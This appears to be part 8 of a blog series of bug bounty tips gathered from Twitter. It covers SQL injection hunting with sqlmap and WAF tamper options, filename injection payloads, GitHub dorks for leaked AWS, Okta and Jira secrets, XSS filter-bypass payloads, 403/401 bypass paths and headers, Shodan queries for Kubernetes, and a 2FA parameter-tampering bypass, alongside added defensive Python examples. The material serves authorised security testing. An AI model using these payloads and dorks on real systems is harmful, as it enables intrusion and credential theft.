This is another dose of bug bounty tips from the bug hunting community on Twitter, sharing their knowledge for all of us to help us find more vulnerabilities and collect bug bounties.
This is the 8th part and in each part we are publishing 10 or more tips. Let’s start!
- 1. Intercepting traffic on iOS13 in Burp Suite
- 2. Find SQL injections (command combo)
- 3. Get scope of Bugcrowd programs in CLI
- 4. GraphQL notes for beginners
- 5. Chaining file uploads with other vulns
- 6. GitHub dorks for AWS, Jira, Okta .. secrets
- 7. Simple reflected XSS scenario
- 8. Database of 500 Favicon hashes (FavFreak)
- 9. XSS firewall bypass techniques
- 10. List of 12 Android security testing tools
- 11. Tips on bypassing 403 and 401 errors
- 12. Find Kubernetes with Shodan
- 13. Multi-factor (2FA) authentication bypass
- Conclusion
1. Intercepting traffic on iOS13 in Burp Suite
By @Dark_Knight
Source: link
If you are having issues intercepting traffic on iOS13 with Burp Suite, try disabling TLSv1.3. You can do that by either one of these methods:
- Use the following command line option:
-Djdk.tls.server.protocols=TLSv1,TLSv1.1,TLSv1.2
- Or on version 2020.8 and above use the following config:
Now there should be no problem intercepting the traffic.
2. Find SQL injections (command combo)
By @El3ctr0Byt3s
Source: link
These 5 commands can help to easily identify SQL injection on our target domain:
subfinder -d target.com | tee -a domains
cat domains | httpx | tee -a urls.alive
cat urls.alive | waybackurls | tee -a urls.check
gf sqli urls.check >> urls.sqli
sqlmap -m urls.sqli --dbs --batch
Here’s what’s going on in detail:
- First we will find all subdomains under our target domain
- Next we will identify all alive web servers running on those subdomains
- Waybackurls will fetch all URLs that the Wayback Machine knows about for the identified alive subdomains
- Now we will filter out URLs that match patterns with potential SQL injection
- The final step is to run sqlmap on all identified potentially vulnerable URLs and let it do its magic
Protip: If you need to bypass WAF (Web Application Firewall) in the process, add the following options to sqlmap:
--level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,ifnull2ifisnull,modsecurityversioned
Here’s where to get all the tools for this tip:
- https://github.com/projectdiscovery/subfinder
- https://github.com/tomnomnom/waybackurls
- https://github.com/projectdiscovery/httpx
- https://github.com/tomnomnom/gf
- https://github.com/1ndianl33t/Gf-Patterns (sqli patterns)
3. Get scope of Bugcrowd programs in CLI
There is a new tool in town called bcscope which can get you the scope of all bug bounty programs available on the Bugcrowd platform, including the private ones.
All you have to do is to provide your Bugcrowd token like this:
bcscope -t <YOUR-TOKEN-HERE> -c 2 -p
Quite convenient and pretty useful!
Get the tool here:
4. GraphQL notes for beginners
By @sillydadddy
Source: link
Here’s a GraphQL introduction 101 for bug bounty hunters compiled by @sillydadddy. This information can help you get up to speed and to get familiar with the GraphQL technology quickly. Here we go:
- GraphQL is used by developers for better usability than REST, so it is mostly implemented as a wrapper over existing REST services. So sometimes developers may not configure it properly for ALL endpoints!
- Most important thing for attacking GraphQL is to get the schema. For that we need to use introspection queries (it may be disabled). There are two versions of introspection queries. So don’t think the query is disabled if it’s not working – try both!
- Check whether you can get hold of GraphQL consoles used by the developers, e.g.:
/graphql
/altair
/playground
etc. etc. (use a wordlist)
- Try adding a debugging parameter to your requests:
&debug=1
- Look for previous versions, e.g.:
v1/graphql
V2/graphql
etc.
- Tools:
  - Altair web browser plugin to run your tests
  - GraphQL Voyager for a visual representation of the schema
  - GraphQL Raider Burp Suite extension
- Vulnerabilities:
  - IDOR (Insecure direct object references)
  - Authorization / Access control issues
  - Insecure mutations (data modifications) in GraphQL
  - Injections, e.g. SQL
Very useful GraphQL 101 indeed!
5. Chaining file uploads with other vulns
By @manas_hunter
Source: link
When testing file upload functionalities in a web application, try setting the filename to the following values:
- ../../../tmp/lol.png → for path traversal
- sleep(10)-- -.jpg → for SQL injection
- <svg onload=alert(document.domain)>.jpg/png → for XSS
- ; sleep 10; → for command injection
With these payloads, we may trigger additional vulnerabilities.
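The defensive counterpart of this tip (and of the SQL injection hunting in tip 2) is an upload handler that never lets the client-supplied filename reach a file path, a query or a page unescaped. The following Python example is added here and is not code from the original post or from any of the tip authors; the upload directory, the SQLite schema and the sample filenames are constructed for the example. It shows a server-chosen storage name (which neutralises the traversal payload), a parameterized insert for the original name (which neutralises the SQL payload), HTML escaping for display (which neutralises the SVG payload) and an extension allow-list (which rejects the command-injection payload, since it has no image extension):

```python
import html
import os
import secrets
import sqlite3

# Constructed upload directory for the example; a real deployment would keep
# this outside the web root.
UPLOAD_DIR = "/var/app/uploads"
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png"}


def open_store():
    """In-memory SQLite store with the example metadata table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE IF NOT EXISTS uploads ("
        "stored_name TEXT PRIMARY KEY, original_name TEXT NOT NULL)"
    )
    return conn


def storage_name_for(client_filename):
    """Derive a server-chosen file name from the client's filename.

    Only the extension of the last path component is taken from the client;
    the name itself is random, so '../' sequences, quotes, tags and shell
    metacharacters in the submitted name never reach a file path.
    Returns None when the extension is not on the allow-list.
    """
    last = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    _stem, ext = os.path.splitext(last)
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    return secrets.token_hex(16) + ext


def storage_path(stored_name):
    """Absolute path for a stored file, checked to stay inside UPLOAD_DIR."""
    root = os.path.realpath(UPLOAD_DIR)
    target = os.path.realpath(os.path.join(root, stored_name))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("path escapes upload directory")
    return target


def register_upload(conn, client_filename):
    """Validate the name, pick a storage name and record the original name.

    The original name is kept only as display metadata and is written with a
    parameterized query, so SQL fragments in it (such as sleep(10)-- -) are
    stored as plain text rather than interpreted.
    """
    stored = storage_name_for(client_filename)
    if stored is None:
        return None
    conn.execute(
        "INSERT INTO uploads (stored_name, original_name) VALUES (?, ?)",
        (stored, client_filename),
    )
    return stored


def lookup_original(conn, stored_name):
    """Read the original name back, again with a bound parameter."""
    row = conn.execute(
        "SELECT original_name FROM uploads WHERE stored_name = ?", (stored_name,)
    ).fetchone()
    return None if row is None else row[0]


def display_name(original_name):
    """HTML-escape the client-supplied name before it is rendered in a page."""
    return html.escape(original_name, quote=True)


if __name__ == "__main__":
    conn = open_store()
    for name in ["../../../tmp/lol.png", "sleep(10)-- -.jpg",
                 "<svg onload=alert(document.domain)>.jpg", "; sleep 10;"]:
        stored = register_upload(conn, name)
        print(repr(name), "->", stored and storage_path(stored), "|", display_name(name))
```

The same pattern applies whatever the storage backend: the client name is data to be displayed, never a path component, a query fragment or a shell argument.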
6. GitHub dorks for AWS, Jira, Okta .. secrets
By @hunter0x7, @GodfatherOrwa
Source: link1, link2
Here are some useful GitHub dorks shared by @hunter0x7 for identifying sensitive information related to Amazon AWS cloud:
org:Target "bucket_name"
org:Target "aws_access_key"
org:Target "aws_secret_key"
org:Target "S3_BUCKET"
org:Target "S3_ACCESS_KEY_ID"
org:Target "S3_SECRET_ACCESS_KEY"
org:Target "S3_ENDPOINT"
org:Target "AWS_ACCESS_KEY_ID"
org:Target "list_aws_accounts"
Here’s another list of GitHub dorks shared by @GodfatherOrwa for identifying various other credentials and secrets:
"target.com" password or secret
"target.atlassian" password
"target.okta" password
"corp.target" password
"jira.target" password
"target.onelogin" password
target.service-now password
sometimes only "target"
Protip: While you are doing GitHub dorking, try also GitDorker (made by @obheda12) which automates the whole process and which contains 400+ dorks in total, for easy bug bounty wins.
Detailed information about GitDorker can be found here.
Also check related tip BBT5-8.
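From the defender's side, the same keywords these dorks search for are what an organisation should be scanning its own repositories for before code is pushed. The following Python example is added here and is not code from the original post, from GitDorker or from the tip authors; it is a small pre-commit style scanner built on the dork keywords above plus the well-known AKIA prefix format of AWS access key ids. The sample files are constructed, and the AWS values in them are the placeholder credentials AWS uses in its own documentation, not live keys:

```python
import re

# Variable names worth a second look, derived from the dork keywords above
# (matched case-insensitively as a substring of the variable name).
SENSITIVE_NAME = re.compile(
    r"(?i)\b(\w*(?:password|secret|access_key)\w*)\s*[:=]\s*['\"]?([^'\"\s,]*)"
)
# Shape of an AWS access key id: AKIA followed by 16 upper-case alphanumerics.
AWS_ACCESS_KEY_ID = re.compile(r"\bAKIA[0-9A-Z]{16}\b")


def looks_like_placeholder(value):
    """True when the value references a secret instead of containing one."""
    if value == "" or value.lower() in ("none", "null", "changeme", "xxx"):
        return True
    if value.startswith(("os.", "$", "<", "{{", "%(")):
        return True
    return "environ" in value or "getenv" in value


def scan_text(path, text):
    """Return findings as (path, line_number, kind, detail) tuples."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in SENSITIVE_NAME.finditer(line):
            name, value = m.group(1), m.group(2)
            if not looks_like_placeholder(value):
                findings.append((path, lineno, "hardcoded-value", name))
        for m in AWS_ACCESS_KEY_ID.finditer(line):
            findings.append((path, lineno, "aws-access-key-id", m.group(0)))
    return findings


def scan_repo(files):
    """files: mapping of repository path -> file contents."""
    findings = []
    for path, text in sorted(files.items()):
        findings.extend(scan_text(path, text))
    return findings


# Constructed sample repository. The AWS values are the documentation
# placeholders published by AWS, not real credentials.
SAMPLE_FILES = {
    "config/settings.py": (
        "DEBUG = True\n"
        "AWS_ACCESS_KEY_ID = 'AKIAIOSFODNN7EXAMPLE'\n"
        "AWS_SECRET_ACCESS_KEY = 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY'\n"
        "DB_PASSWORD = os.environ['DB_PASSWORD']\n"
    ),
    "README.md": "Set AWS_ACCESS_KEY_ID in your shell before running the deploy script.\n",
    "deploy/jira.yml": "jira_url: https://jira.target.example\njira_password: hunter2\n",
}

if __name__ == "__main__":
    for finding in scan_repo(SAMPLE_FILES):
        print("%s:%d %s %s" % finding)
```

The placeholder check keeps `os.environ[...]` style references out of the results; the README mention of the variable name is not reported because nothing is assigned to it.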
7. Simple reflected XSS scenario
By @_justYnot
Source: link
Here’s an interesting bug bounty write-up leading to a reflected XSS (Cross-Site Scripting by visiting a link).
The author was able to successfully identify and exploit XSS despite the fact that the application was filtering some characters and keywords (possibly protected by WAF).
Here’s what @_justYnot did in detail:
- Run subfinder -d target.com | httprobe -c 100 > target.txt
- Run cat target.txt | waybackurls | gf xss | kxss
- Got a URL which had all the special characters unfiltered and the parameter was callback=
- Tried some basic XSS payloads but they weren’t working, the site was filtering some keywords in the payload (like script and alert)
- Then he referred to the @PortSwigger XSS cheat sheet (link)
- After trying some payloads, one payload with event as onbegin worked and XSS executed successfully!
- Made a good report, sent it to the company last month and got rewarded $$
This is a perfect example why we should never give up when things get difficult. When you’ve got a lead, you have to keep pushing to get the reward!
Here’s the list of tools @_justYnot used:
- https://github.com/projectdiscovery/subfinder
- https://github.com/tomnomnom/httprobe
- https://github.com/tomnomnom/waybackurls
- https://github.com/tomnomnom/gf
- https://github.com/1ndianl33t/Gf-Patterns (xss pattern)
- https://github.com/tomnomnom/hacks/tree/master/kxss
8. Database of 500 Favicon hashes (FavFreak)
By @0xAsm0d3us
Source: link
There is a very cool new project called FavFreak which contains around 500 Favicon hashes.
This can be extremely useful during bug bounties, OSINT, fingerprinting etc. as it allows you to easily identify what kind of software is deployed on a particular URL.
The tool allows you to fetch Favicons from a list of URLs and sort them based on their Favicon hash. The usage is very straightforward:
cat urls.txt | python3 favfreak.py -o output
As a result, you will see:
- Which Favicon hash is on which URL
- Identified software based on the Favicon hash
- Summary and statistics
FavFreak can identify pretty much any contemporary software that is widely used nowadays. You can also easily add additional fingerprints.
Get FavFreak from here:
9. XSS firewall bypass techniques
Here’s a list of 7 useful techniques on how we can bypass WAF (Web Application Firewall) while exploiting XSS (Cross-Site Scripting) in a web application:
- Check if the firewall is blocking only lowercase:
<sCRipT>alert(1)</sCRiPt>
- Try to break firewall regex with new line (\r\n), aka. CRLF injection:
<script>%0d%0aalert(1)</script>
- Try double encoding:
%2522
- Testing for recursive filters: if the firewall removes only the inner <script> and </script> substrings in a single pass (marked in bold in the original tip), the remaining text forms a clean payload:
<scr<script>ipt>alert(1);</scr</script>ipt>
- Injecting anchor tag without whitespaces:
<a/href="j	a	v	asc	ri	pt:alert(1)">
- Try to bypass whitespaces using a bullet:
<svg•onload=alert(1)>
- Try to change request method (POST instead of GET):
GET /?q=xss
POST /
q=xss
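Each technique in this list exploits a filter that inspects the raw input only once, or only in one form. The following Python example is added here and is not code from the original post; the sample payloads are the ones listed above, constructed inline. It shows why a single-pass blacklist fails on the recursive-filter payload, then normalises input the way a detection rule should (decode until stable, lower-case, drop control characters, whitespace and the bullet) before matching, and finally applies output encoding, which is the actual fix rather than a better blacklist:

```python
import html
import re
from urllib.parse import unquote

# Constructed samples: the payloads from the list above plus a double-encoded one.
SAMPLE_PAYLOADS = [
    "<sCRipT>alert(1)</sCRiPt>",
    "<script>%0d%0aalert(1)</script>",
    "<scr<script>ipt>alert(1);</scr</script>ipt>",
    '<a/href="j\ta\tv\tasc\tri\tpt:alert(1)">',
    "<svg\u2022onload=alert(1)>",
    "%253Cscript%253Ealert(1)%253C/script%253E",
]


def naive_single_pass_strip(value):
    """The kind of filter the recursive payload defeats: one case-sensitive
    removal of <script> and </script>. The leftovers reassemble into a tag."""
    return value.replace("<script>", "").replace("</script>", "")


def decode_fully(value, max_rounds=5):
    """URL-decode until the value stops changing (bounded), so %2522 -> %22 -> '"'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def normalize(value):
    """Canonical form for matching: decoded, lower-case, with control
    characters, ASCII whitespace and the bullet (U+2022) removed."""
    value = decode_fully(value).lower()
    return re.sub(r"[\x00-\x20\u2022]", "", value)


XSS_INDICATOR = re.compile(r"<script|on[a-z]+=|javascript:")


def flags_xss(value):
    """Detection signal for logging or blocking; not a sanitiser."""
    return XSS_INDICATOR.search(normalize(value)) is not None


def safe_render(value):
    """Output encoding: the fix that does not depend on recognising payloads."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    print(naive_single_pass_strip(SAMPLE_PAYLOADS[2]))
    for p in SAMPLE_PAYLOADS:
        print(flags_xss(p), normalize(p), safe_render(p), sep=" | ")
```

Whitespace stripping makes the indicator regex deliberately coarse (a parameter named "onion" would match), which is acceptable for a detection signal but is exactly why the rendering path relies on escaping instead.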
Protip: Check also previously published tip on WAF bypass BBT7-5.
10. List of 12 Android security testing tools
This is a compilation of some of the best Android security testing tools available today:
- Dex2JAR - Set of tools to work with Android Dex and Java CLASS files
- ByteCodeView - Java & Android APK reverse engineering suite (decompiler, editor, debugger & more)
- JADX - Dex to Java decompiler tools for producing Java source code from Android Dex and APK files
- JD-GUI - A standalone graphical utility that displays Java sources from CLASS files
- Drozer - A comprehensive security testing framework for Android
- Baksmali - An assembler/disassembler for the Dex format used by Dalvik (Android's Java)
- AndroGuard - A swiss army knife for analyzing, decompilation and reversing of Android apps
- ApkTool - Another swiss army knife tool for reverse engineering Android apps
- QARK - Tool to look for several security related Android application vulnerabilities
- AndroBugs - Another analysis tool for identifying security vulnerabilities in Android applications
- AppMon - An automated framework for monitoring and tampering system API calls of native macOS, iOS and Android apps
- MobSF - An all-in-one automated mobile security framework supporting Android, iOS and Windows mobile apps
Truly a remarkable list of tools, not just for reversing of Android apps!
Some of them excel in static analysis, some are for dynamic analysis, some of them tackle both, but all of them are open-source and free to use!
11. Tips on bypassing 403 and 401 errors
By @RathiArpeet
Source: link
Here's a list of tips on how to bypass 403 Forbidden and 401 Unauthorized errors:
1. By adding headers: X-Originating-IP, X-Remote-IP, X-Client-IP, X-Forwarded-For etc. Sometimes companies whitelist the IP addresses of those allowed to access sensitive data. These headers take an IP address as a value and let you access the resource if the supplied IP matches one of their whitelisted ones.
2. With unicode chars: Try inserting unicode characters to bypass the defenses. Try e.g. ℀ = ca, ℁ = sa and many other (check here or here). So if /cadmin is blocked, try accessing ℀dmin. Check this short youtube video on unicode hacking tricks for more details.
3. By overriding / overwriting the URL with headers: If GET /admin gives you 403 Forbidden, try GET /accessible (any accessible endpoint) and add any of these HTTP headers:
X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
4. Try different payloads: If GET /admin gives you 403 Forbidden, try accessing:
/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#
5. Method switching: Change the method from GET to POST and see if you get a different response.
6. Via IP, Vhost: Access the site via its IP or Vhost to get the forbidden content.
7. Fuzzing: By bruteforcing (fuzzing) files or directories further.
Protip: Check also previously published tips related to this: BBT6-6, BBT4-5 and BBT4-6.
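All of the bypasses in this list work because the access check looks at a different string than the one the back-end eventually routes: a raw path with `;` parameters, dots or encoding still in it, a URL taken from an override header, or a method the rule did not cover. The following Python example is added here and is not code from the original post or the tip author; the route names, roles and header sets are constructed for the example. It canonicalises the request target (decode until stable, NFKC-normalise, drop `;` path parameters, resolve `.` and `..`) before the authorization decision, refuses requests carrying the override headers from this list, and applies the rule regardless of method:

```python
import unicodedata
from urllib.parse import unquote

# Headers from the tip that some stacks treat as "route this as another URL".
# An edge proxy should strip them from client requests; here they are refused.
OVERRIDE_HEADERS = {"x-original-url", "x-override-url", "x-rewrite-url"}
# Client-supplied IP headers from the tip. They are never consulted for the
# access decision here; they are only surfaced for logging.
CLIENT_IP_HEADERS = {"x-originating-ip", "x-remote-ip", "x-client-ip", "x-forwarded-for"}


def decode_fully(value, max_rounds=5):
    """Percent-decode until the value stops changing (bounded)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def canonical_path(raw_target):
    """Reduce a request target to the path the back-end will actually serve."""
    path = raw_target.split("#", 1)[0].split("?", 1)[0]
    path = decode_fully(path)
    # Compatibility characters (fullwidth letters and similar) fold to ASCII.
    path = unicodedata.normalize("NFKC", path)
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]  # drop path parameters such as "..;"
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def is_protected(canon):
    """Example rule: everything under /admin requires the admin role."""
    return canon == "/admin" or canon.startswith("/admin/")


def untrusted_ip_headers(headers):
    """Names of client-IP headers present, for the access log only."""
    return sorted(k.lower() for k in headers if k.lower() in CLIENT_IP_HEADERS)


def authorize(method, raw_target, headers, role):
    """Return (allowed, reason). The method is logged but never relaxes the rule."""
    names = {k.lower() for k in headers}
    overrides = sorted(names & OVERRIDE_HEADERS)
    if overrides:
        return False, "override header(s) refused: " + ", ".join(overrides)
    canon = canonical_path(raw_target)
    if is_protected(canon) and role != "admin":
        return False, "%s %s requires admin" % (method, canon)
    return True, "%s %s allowed" % (method, canon)


if __name__ == "__main__":
    for target in ["/accessible/..;/admin", "/.;/admin", "/admin;/", "/admin/~",
                   "/./admin/./", "/admin?param", "/%2e/admin", "/admin#"]:
        print(target, "->", canonical_path(target), authorize("GET", target, {}, "user"))
```

The same canonical form should also feed logging, so that an attempt on `/accessible/..;/admin` is recorded as an attempt on `/admin`.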
12. Find Kubernetes with Shodan
Here are 2 easy ways to identify Kubernetes in your target organization using the Shodan CLI and httpx:
1. Look for product "Kubernetes":
shodan search org:"target" product:"Kubernetes" | awk '{print $3 ":" $2}' | httpx -path /pods -content-length -status-code -title
2. Look for port "10250":
shodan search org:"target" port:"10250" | awk '{print $3 ":" $2}' | httpx -path /pods -content-length -status-code -title
Quite handy!
Make sure to have installed the following tools:
13. Multi-factor (2FA) authentication bypass
Here's an interesting tip to bypass 2FA in a web application or a mobile application.
1. Always compare both HTTP requests while logging in - with 2FA enabled and with 2FA disabled.
2. While 2FA is disabled:
- Request:
{"email":"[email protected]","password":"abc@123","mfa":null,"code":""}
- Response:
Location: https://vulnerable-site.com/user/dashboard
3. While 2FA is enabled:
- Request:
{"email":"[email protected]","password":"abc@123","mfa":true,"code":""}
- Response:
Location: https://vulnerable-site.com/v1/proxy/authentication/authenticate
4. Now tamper with the parameters and change to "mfa":null,"code":""
- Response:
Location: https://vulnerable-site.com/user/dashboard
Easy and simple 2FA bypass!
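The root cause here is that the server lets the client state whether MFA applies. The following Python example is added here and is not code from the original post; the user store, the e-mail addresses and the code-issuing logic are constructed for the example (passwords are kept in plain text only to keep it short; a real system stores hashes and rate-limits code attempts). It places the vulnerable login, which reads the "mfa" field from the request, beside a hardened one that looks up enrolment server-side, ignores the client flag entirely and only redirects to the dashboard after a code it issued has been verified:

```python
import hmac
import secrets

# Constructed user store. "mfa_enrolled" is the server-side fact that the
# hardened login consults; the client never gets to assert it.
USERS = {
    "alice@example.com": {"password": "abc@123", "mfa_enrolled": True, "pending_code": None},
    "bob@example.com": {"password": "abc@123", "mfa_enrolled": False, "pending_code": None},
}
DASHBOARD = "https://vulnerable-site.com/user/dashboard"
MFA_STEP = "https://vulnerable-site.com/v1/proxy/authentication/authenticate"


def _password_ok(user, supplied):
    return user is not None and hmac.compare_digest(user["password"], supplied or "")


def issue_code():
    """Six-digit one-time code (constructed stand-in for TOTP/SMS delivery)."""
    return "".join(secrets.choice("0123456789") for _ in range(6))


def vulnerable_login(req):
    """Trusts req["mfa"]: sending "mfa": null skips the second factor."""
    user = USERS.get(req.get("email"))
    if not _password_ok(user, req.get("password")):
        return {"status": 401, "location": None}
    if req.get("mfa"):
        return {"status": 302, "location": MFA_STEP}
    return {"status": 302, "location": DASHBOARD}


def hardened_login(req):
    """Enrolment comes from the user record; req["mfa"] is never read."""
    user = USERS.get(req.get("email"))
    if not _password_ok(user, req.get("password")):
        return {"status": 401, "location": None}
    if not user["mfa_enrolled"]:
        return {"status": 302, "location": DASHBOARD}
    code = req.get("code") or ""
    if not code:
        # First leg: issue a code and send the client to the MFA step.
        if user["pending_code"] is None:
            user["pending_code"] = issue_code()
        return {"status": 302, "location": MFA_STEP}
    expected = user["pending_code"] or ""
    if expected and hmac.compare_digest(expected, code):
        user["pending_code"] = None  # single use
        return {"status": 302, "location": DASHBOARD}
    return {"status": 401, "location": None}


if __name__ == "__main__":
    tampered = {"email": "alice@example.com", "password": "abc@123", "mfa": None, "code": ""}
    print("vulnerable:", vulnerable_login(tampered))
    print("hardened:  ", hardened_login(tampered))
```

The fix is not a better check on the "mfa" field but removing it from the trust boundary: the only client input that influences the second leg is the code, and it is compared against a value the server generated.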
Conclusion
That’s it for this part of the bug bounty tips.
Massive thanks to all the authors for sharing their tips:
- @Dark_Knight
- @El3ctr0Byt3s
- @sw33tLie
- @sillydadddy
- @manas_hunter
- @hunter0x7
- @GodfatherOrwa
- @_justYnot
- @0xAsm0d3us
- @sratarun
- @cry__pto
- @RathiArpeet
- @Alra3ees
- @N008x
Make sure to follow them on Twitter, they will help you stay on top of the bug bounty game!